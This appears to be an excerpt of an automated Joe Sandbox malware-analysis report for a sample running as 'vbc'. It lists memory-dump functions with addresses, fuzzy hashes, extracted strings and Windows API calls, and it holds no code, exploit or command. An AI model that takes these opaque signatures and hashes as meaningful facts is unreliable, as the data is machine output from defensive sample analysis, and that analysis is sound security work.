Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 07002EF8 Relevance: 8.8, Strings: 6, Instructions: 1257COMMON

Download Yara Rule

Strings

Xaq, xrefs: 07002FF0
Xaq, xrefs: 070041D5
Xaq, xrefs: 0700306F
Xaq, xrefs: 070030BC
Xaq, xrefs: 070041FE
Xaq, xrefs: 07002FB6

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq$Xaq$Xaq
API String ID: 0-499371476
Opcode ID: 0021c25f7d6b1f3e98aea14db324c46d44c8866801804053e9ad976b1e0585ae
Instruction ID: f34a994c19e860e2f606909c462eb42b876664a60b86327d0eca5b10e7781894
Opcode Fuzzy Hash: 0021c25f7d6b1f3e98aea14db324c46d44c8866801804053e9ad976b1e0585ae
Instruction Fuzzy Hash: 51A21BE251E2D34FEB138B64A8611DDFFB1AE1B224B280ADBC5C1971D3D36455A8C7C2

Function 0700C4E0 Relevance: 6.6, Strings: 5, Instructions: 354
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0700C902
PH]q, xrefs: 0700C913
Lj@p, xrefs: 0700C88A
0o@p, xrefs: 0700C71D
Lj@p, xrefs: 0700C8A0

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 066de82935139c45a75c0708e95cc82fbed4eb62dece25aa9703bfd67763a42f
Instruction ID: e6a12402e8d2f7411c7ea030592a668a58426a2d1aecff7af67378eb826cb52b
Opcode Fuzzy Hash: 066de82935139c45a75c0708e95cc82fbed4eb62dece25aa9703bfd67763a42f
Instruction Fuzzy Hash: F4E110B5E00219DFEB54CF69C884A9EBBF1BF49310F158269E815AB3A1DB30D941CF91

Function 0700D20C Relevance: 6.5, Strings: 5, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0700D473
PH]q, xrefs: 0700D462
Lj@p, xrefs: 0700D400
Lj@p, xrefs: 0700D3EA
0o@p, xrefs: 0700D27D

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 472f993a203b87749d6387cf855a869c130ab6270535daebed552250fc127432
Instruction ID: 5ed979d8a1d83e90c95410f7e9e060a3bf5ff23ed48c9767a7de8047c7af08eb
Opcode Fuzzy Hash: 472f993a203b87749d6387cf855a869c130ab6270535daebed552250fc127432
Instruction Fuzzy Hash: BD91F7B4E00248DFEB54CFA9D984A9DBBF2BF89310F14C1A9D419A73A5DB349941CF50

Function 0700D7B8 Relevance: 6.5, Strings: 5, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0o@p, xrefs: 0700D82D
Lj@p, xrefs: 0700D9B0
Lj@p, xrefs: 0700D99A
PH]q, xrefs: 0700DA23
PH]q, xrefs: 0700DA12

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: c1bba16d3776044f0a6ae3bc300357bd60b1cf5ae92623d09e33b3cc01917b9b
Instruction ID: 43c095987ea1d17fc8cba70c8aaea12bbb881b5d2ee7d7b0b3b519efff7be041
Opcode Fuzzy Hash: c1bba16d3776044f0a6ae3bc300357bd60b1cf5ae92623d09e33b3cc01917b9b
Instruction Fuzzy Hash: DB91E4B4E00208CFEB54DFAAD984A9DBBF2BF89310F14C169E419AB365DB349941CF50

Function 0700586F Relevance: 6.4, Strings: 5, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Lj@p, xrefs: 07005A79
Lj@p, xrefs: 07005A63
PH]q, xrefs: 07005AEC
0o@p, xrefs: 070058F5
PH]q, xrefs: 07005ADB

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 88c967b4fcaa1d22c81c35ad8e94c019bb307216204d5a5b2aa2a83c619c7f53
Instruction ID: 008981f0af3732ff608968e99f17b1c1221896d587115e49f8f0841087ce9d92
Opcode Fuzzy Hash: 88c967b4fcaa1d22c81c35ad8e94c019bb307216204d5a5b2aa2a83c619c7f53
Instruction Fuzzy Hash: D391E5B4E00208DFEB54DFA9D884A9DBBF2BF89310F148169E809AB361DB309945CF50

Function 0700CF30 Relevance: 6.4, Strings: 5, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Lj@p, xrefs: 0700D112
0o@p, xrefs: 0700CFA5
PH]q, xrefs: 0700D18A
Lj@p, xrefs: 0700D128
PH]q, xrefs: 0700D19B

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 5cd9579ecbe04631cb285632eb66213e936361bb9fee0f9e953954fe5e363f1d
Instruction ID: 6183141d241375ee70dd9632d3209222db158e1452e13700220dafceb2985b1e
Opcode Fuzzy Hash: 5cd9579ecbe04631cb285632eb66213e936361bb9fee0f9e953954fe5e363f1d
Instruction Fuzzy Hash: E381F7B4E00208DFEB54DFA9C884A9DBBF2BF89310F14C169E419AB3A5DB349945CF51

Function 0700C980 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0700CBEB
0o@p, xrefs: 0700C9F5
PH]q, xrefs: 0700CBDA
Lj@p, xrefs: 0700CB62
Lj@p, xrefs: 0700CB78

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: d901a0d6d05e3a37b6d6fa7e0e44e21c98ea91d8467afe09d0d39065bf4be179
Instruction ID: 178838666f89020981aab8cead66c387f8b418bd8ccc3cd621ef62eb93224542
Opcode Fuzzy Hash: d901a0d6d05e3a37b6d6fa7e0e44e21c98ea91d8467afe09d0d39065bf4be179
Instruction Fuzzy Hash: 6B81E5B4E00208CFEB54CFA9C884A9DBBF2BF89310F14C169E419AB365DB309945CF50

Function 0700CC58 Relevance: 6.4, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Lj@p, xrefs: 0700CE3A
Lj@p, xrefs: 0700CE50
PH]q, xrefs: 0700CEC3
0o@p, xrefs: 0700CCCD
PH]q, xrefs: 0700CEB2

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: bbce3a62fbfff9110771717ea46e4c3b3d1c01e96402320550dd24ff0dd9dc64
Instruction ID: 5ae4b385ca24836257eb88a7796771d26f42187abb98a991ac21e5261b8c81d8
Opcode Fuzzy Hash: bbce3a62fbfff9110771717ea46e4c3b3d1c01e96402320550dd24ff0dd9dc64
Instruction Fuzzy Hash: 9381D6B4E00208CFEB54DFA9D984A9DBBF2BF89310F14C169E419A7365DB349945CF50

Function 0700D4EE Relevance: 6.4, Strings: 5, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 0700D73A
PH]q, xrefs: 0700D74B
0o@p, xrefs: 0700D555
Lj@p, xrefs: 0700D6D8
Lj@p, xrefs: 0700D6C2

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: 2f90c31db2d711b22913160ff77689e031a76db1b89e435829972c2d30b1d54f
Instruction ID: 8a440ebec4a80960ec08287e2251e9fc036423f879534673222b6658dd259f03
Opcode Fuzzy Hash: 2f90c31db2d711b22913160ff77689e031a76db1b89e435829972c2d30b1d54f
Instruction Fuzzy Hash: FE81D7B4E00608CFEB54DFA9D984A9DBBF2BF89310F14C169E419AB365DB349941CF50

Function 07007630 Relevance: 5.3, Strings: 4, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 07007738
,aq, xrefs: 070077A2
,aq, xrefs: 070077B0
(o]q, xrefs: 0700772A

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$,aq$,aq
API String ID: 0-1947289240
Opcode ID: ddda2ad63cd36e453482e60b35934ba9bb1fd4bd21d1818d004ea48f753bb0e8
Instruction ID: db3faa8d84bccf0aa9e2797d1ced7f0b1ba58c4721394f31c08580e0d5cd17d2
Opcode Fuzzy Hash: ddda2ad63cd36e453482e60b35934ba9bb1fd4bd21d1818d004ea48f753bb0e8
Instruction Fuzzy Hash: 08D15EB0A0011ADFEF54CF69C884AADBBF2FF89320F559255E415A73A1D738E941CB90

Function 0700C6A8 Relevance: 3.9, Strings: 3, Instructions: 155COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0700C902
PH]q, xrefs: 0700C913
0o@p, xrefs: 0700C71D

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$PH]q$PH]q
API String ID: 0-2023588385
Opcode ID: a30e56114d1692d6758106a7d01d2df51865f9e15670c2a35135253d7238dbb8
Instruction ID: d62321cabd4bb39800938cdaa77f3184066f166fbe93b2947efe4358425232e5
Opcode Fuzzy Hash: a30e56114d1692d6758106a7d01d2df51865f9e15670c2a35135253d7238dbb8
Instruction Fuzzy Hash: 74610AB4E002089FEB58CFAAD9846DEBBF2BF89310F14D169E418AB365DB345841CF50

Function 0700A598 Relevance: 3.4, Strings: 2, Instructions: 906COMMON

Download Yara Rule

Strings

4']q, xrefs: 0700B023
(o]q, xrefs: 0700AA28

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: (o]q$4']q
API String ID: 0-176817397
Opcode ID: bf330e9d459b8110dd0df653b9e7c3469adaab27ed9affad71723febb8ba0f62
Instruction ID: 1c55167259e382a89cd4b72b168598e0f4083b680f541113d9239f542a9b1902
Opcode Fuzzy Hash: bf330e9d459b8110dd0df653b9e7c3469adaab27ed9affad71723febb8ba0f62
Instruction Fuzzy Hash: AF8270F170020ADFDB15CF68C984AAEBBF2BF49320F15C656E4159B2A1D734E981CB91

Function 07006EA8 Relevance: 3.0, Strings: 2, Instructions: 537COMMON

Download Yara Rule

Strings

Haq, xrefs: 070072BA
(o]q, xrefs: 070073EE

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: (o]q$Haq
API String ID: 0-903699183
Opcode ID: 6a08369870b4be5c8668d73a5b1504ea37c0502cf0cfe17d00130523c91e86f0
Instruction ID: beaeffd6c6f4c19f6882a57d8721e4ed8daf110e3031114fb6592490617e6e7d
Opcode Fuzzy Hash: 6a08369870b4be5c8668d73a5b1504ea37c0502cf0cfe17d00130523c91e86f0
Instruction Fuzzy Hash: E022D1B0A002099FDB54CF69C844AAEBBF6FF89310F148669E405DB395DF38AD41CB91

Function 0700EED4 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdbd0f2f5a7d70ce8b5acc5a03efd87853b89b86335e8bd94bff4ab576fea66
Instruction ID: 8c1f30072dbc91c58356d9b7b5d498543cd7a80276a4fb69eeb6445783c78d30
Opcode Fuzzy Hash: 4bdbd0f2f5a7d70ce8b5acc5a03efd87853b89b86335e8bd94bff4ab576fea66
Instruction Fuzzy Hash: 4A51F9B4E01208DFEB18DFAAD944A9DFBB6FF89310F108129E815AB3A5DB345841CF54

Function 0700EEE0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6075e418c2bd9ebecd46f7ef33426c4995d9506bfad0e2773070bde1bf01700
Instruction ID: fe55db512e6d0686896eb148ac51be1bd48ff9484ea209d17d3643678b165683
Opcode Fuzzy Hash: c6075e418c2bd9ebecd46f7ef33426c4995d9506bfad0e2773070bde1bf01700
Instruction Fuzzy Hash: 4D51D9B4E01208DFEB18DFAAD544A9DBBF6FF89310F108129E815AB3A5DB345841CF54

Function 07007C08 Relevance: 10.5, Strings: 8, Instructions: 492
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,aq, xrefs: 070080B8
(o]q, xrefs: 07007D2D
,aq, xrefs: 070080A8
(o]q, xrefs: 07007C46
(o]q, xrefs: 07008127
(o]q, xrefs: 07008117
(o]q, xrefs: 07007D01
(o]q, xrefs: 07007DCA

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-1435242062
Opcode ID: 07e9d0b9373cf2dec2399da76e06a6bc9f839ced2fccfe1dfc6e7cc55c910417
Instruction ID: fcacd34f95653993900e249d3a4c0081498e6f0f24328f53268bacf9528d4871
Opcode Fuzzy Hash: 07e9d0b9373cf2dec2399da76e06a6bc9f839ced2fccfe1dfc6e7cc55c910417
Instruction Fuzzy Hash: 28128CB0A006099FDB54CF68D984AAEBBF6FF49324F148659E415DB3A1DB34EC41CB90

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000009.00000002.4510131451.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.4510131451.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4510131451.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 070095A0 Relevance: 2.8, Strings: 2, Instructions: 313COMMON

Download Yara Rule

Strings

4']q, xrefs: 070095EF
4']q, xrefs: 070095C9

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: 769b9cf2431e69a5b0b2dd3e9519c58c66610bbf18c56f6c7c8d85c5c9038657
Instruction ID: 2695426781e3d9137f48fb4307a7e6228985eaa68ffe7c756a17406d00804093
Opcode Fuzzy Hash: 769b9cf2431e69a5b0b2dd3e9519c58c66610bbf18c56f6c7c8d85c5c9038657
Instruction Fuzzy Hash: 68B18EB43245028FEB659B2DC46873D36DAAF81620F15016AE026CF3F7DA2AEC41C7D1

Function 07006448 Relevance: 2.8, Strings: 2, Instructions: 268COMMON

Download Yara Rule

Strings

Haq, xrefs: 07006533
Haq, xrefs: 07006566

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: Haq$Haq
API String ID: 0-4016896955
Opcode ID: 32ffd4478665e34d0b31be2e89a6ea3bb24a7dee4dabeb19d2051e1affca76d6
Instruction ID: b9ca11ed5c5930328323d00fc9fd495082cd9f0f87f2eb189500891357be6e88
Opcode Fuzzy Hash: 32ffd4478665e34d0b31be2e89a6ea3bb24a7dee4dabeb19d2051e1affca76d6
Instruction Fuzzy Hash: C9910EB0304252AFEB459F28D854A7E7BE3AF89310F448669E8468B3D5CF79C851CBD1

Function 070069A8 Relevance: 2.7, Strings: 2, Instructions: 239COMMON

Download Yara Rule

Strings

,aq, xrefs: 07006A7E
,aq, xrefs: 07006A88

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: ,aq$,aq
API String ID: 0-2990736959
Opcode ID: bf352dea1f7e508cf415098f95b9e3324e786489d78a22bb5a46009844fd98fe
Instruction ID: 522393b00a841aceee1701f728200ba63f54ad56e63fd70766e7558f35c8e417
Opcode Fuzzy Hash: bf352dea1f7e508cf415098f95b9e3324e786489d78a22bb5a46009844fd98fe
Instruction Fuzzy Hash: 4A9190F0A001068FEB44DF69C88496DBBF6FF8A320F148269D4159B3A1DB32D891CB91

Function 07009410 Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

$]q, xrefs: 070094CC
$]q, xrefs: 070094EF

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 4a73c504aa314ef6a03f9b1ea8f6476c11c0750201a2666ce6e86525d839301f
Instruction ID: b13e42efc995bec6571be950f2b55a3908e2c2624cb0dc74d235cd8e734ecdb8
Opcode Fuzzy Hash: 4a73c504aa314ef6a03f9b1ea8f6476c11c0750201a2666ce6e86525d839301f
Instruction Fuzzy Hash: AC31C8B03691428FEB658F29C854A3E7BA5BFC5721F154A66D012CB2D3DA68EC80C7D1

Function 070011A0 Relevance: 1.8, Strings: 1, Instructions: 543COMMON

Download Yara Rule

Strings

LR]q, xrefs: 0700141F

Memory Dump Source

Source File: 00000009.00000002.4513322855.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7000000_vbc.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 75961aab8502ae2fc2ddd0600ec70160cd5c9afd0d36a72c0037dcbe717ef524
Instruction ID: 1d591e88c030c23a2d04206c02625edbec6ce2101c4e6685843c158a61d71828
Opcode Fuzzy Hash: 75961aab8502ae2fc2ddd0600ec70160cd5c9afd0d36a72c0037dcbe717ef524
Instruction Fuzzy Hash: 8652D8B4A01219DFCB54DF24E995A9DBBB6FF48300F5081A9D40AA7396DB346EC5CF80

Function 09F66FC4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,09F67316,?,?,?,?,?), ref: 09F673D7

Memory Dump Source

Source File: 00000009.00000002.4527528278.0000000009F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9f60000_vbc.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 84876a8724604dc93540671a989b3c3c391d6052092314e602388d5858c2d48d
Instruction ID: 0ab9a01af360a6a8096553d2399e78b9c13db7c65bc8daf4a4587d69abe363c8
Opcode Fuzzy Hash: 84876a8724604dc93540671a989b3c3c391d6052092314e602388d5858c2d48d
Instruction Fuzzy Hash: 1321E6B5D013489FDB10DF9AD585ADEBBF8FB48314F14801AE918A3310D378A950CFA5

Function 09F67BA4 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E24,?,?,09F69010,081C4100,072CD7EC), ref: 09F690A1

Memory Dump Source

Source File: 00000009.00000002.4527528278.0000000009F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9f60000_vbc.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: b635ab5cfa3d8ae8b735f1063dc66f94b2bdf1c1ac764b7209234664bdb44532
Instruction ID: 0e6265405b1f3fc011c50563799c7188653355d9c0a0e87a44c152ae571e44d9
Opcode Fuzzy Hash: b635ab5cfa3d8ae8b735f1063dc66f94b2bdf1c1ac764b7209234664bdb44532
Instruction Fuzzy Hash: 912149B1D042099FDB14DFAAC844BEEFBF4FB98310F108429E458A3250D7B8A945CFA1

Function 09F67BA3 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E24,?,?,09F69010,081C4100,072CD7EC), ref: 09F690A1

Memory Dump Source

Source File: 00000009.00000002.4527528278.0000000009F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9f60000_vbc.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: dac8fafcef5e2241557e3569db62a4f295988cb142c355f358e8fb57a04dcacc
Instruction ID: d2b4af2867fe0ba0bd17d728a207c8e1dd1814a1d7333bdb430ac0da52cd11c8
Opcode Fuzzy Hash: dac8fafcef5e2241557e3569db62a4f295988cb142c355f358e8fb57a04dcacc
Instruction Fuzzy Hash: 782138B1D042099FDB14DFAAC844BEEFBF4EB88320F148429D459A7250D7B9A944CFA1

Function 09F6734B Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,09F67316,?,?,?,?,?), ref: 09F673D7

Memory Dump Source

Source File: 00000009.00000002.4527528278.0000000009F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9f60000_vbc.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0f0376fa53a4828524476189f9cfb1082e744bbc1c6d06f63fc8019dfa513470
Instruction ID: c58251e485363377624cffe56db38f26661a570f09106a534049b9ef83df1323
Opcode Fuzzy Hash: 0f0376fa53a4828524476189f9cfb1082e744bbc1c6d06f63fc8019dfa513470
Instruction Fuzzy Hash: 4A21E2B5D00249AFDB10CFAAD585AEEBFF4FB48310F14801AE958A3310C378A950CFA0

Function 09F6902F Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E24,?,?,09F69010,081C4100,072CD7EC), ref: 09F690A1

Memory Dump Source

Source File: 00000009.00000002.4527528278.0000000009F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9f60000_vbc.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: f944ee12ff8d3fef61a658168d1e4447180a043d0e3b18b2f9dff7ba0c04c23c
Instruction ID: 2a9d0fbd5e47d5f6a4e870049cb43b350472a47d6451086b8525af0d193d0469
Opcode Fuzzy Hash: f944ee12ff8d3fef61a658168d1e4447180a043d0e3b18b2f9dff7ba0c04c23c
Instruction Fuzzy Hash: 842127B1D002099FDB14CFAAC845BEEFBF5FB98310F14842AD459A3250C778A945CFA1

Function 09F693B8 Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?), ref: 09F6943D

Memory Dump Source

Source File: 00000009.00000002.4527528278.0000000009F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9f60000_vbc.jbxd

Similarity

API ID: Message
String ID:
